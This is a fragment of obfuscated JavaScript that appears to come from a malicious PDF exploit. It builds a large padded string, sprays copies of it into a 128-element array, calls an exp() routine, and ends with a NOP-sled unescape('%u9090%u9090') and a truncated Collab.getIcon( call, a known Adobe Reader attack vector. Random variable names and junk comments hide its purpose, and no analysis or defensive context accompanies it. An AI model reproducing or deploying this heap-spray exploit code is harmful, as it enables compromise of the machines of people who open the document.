var XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV = LbWxSqgNmAwjUaoXaywhlH(strexchg("WRJJ0c0CWRJJ0c0c"));
while (XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV["length"] +28 < 65536)
XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV+=XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV;
KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo = XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV["substring"](0, (3084-36)/2);
KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo += TCfIpiOxOYTTeNgDQsDQaDtVjQ;
KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo += XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV;
KoHQQkRIckZJKtdlKTGyUUS = KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo["substring"](0, 65536/2);
while(KoHQQkRIckZJKtdlKTGyUUS["length"] < 524288) KoHQQkRIckZJKtdlKTGyUUS += KoHQQkRIckZJKtdlKTGyUUS;
bdfzsvuobNyDZnrqvFjkFWMnGaDbvlYCKTfwjiCwLEXKoTngADhROnZManDz = KoHQQkRIckZJKtdlKTGyUUS["substring"](0, 524288-4120/2) //ashlfajl;afj
var JkNUxvkKFXvIXewntXRjnLOytMONPyrcUEpPSGrzHuBijVDY = new Array()//ip[wo][]
for(tYzswEF=0;tYzswEF<0x80;tYzswEF++) JkNUxvkKFXvIXewntXRjnLOytMONPyrcUEpPSGrzHuBijVDY[tYzswEF]=bdfzsvuobNyDZnrqvFjkFWMnGaDbvlYCKTfwjiCwLEXKoTngADhROnZManDz+"s";
//shklfh
//ahf;lajf;
}
else
{
exp();
}
/* static-property-alias-sinks */
unescape('%u9090%u9090');Collab.getIcon(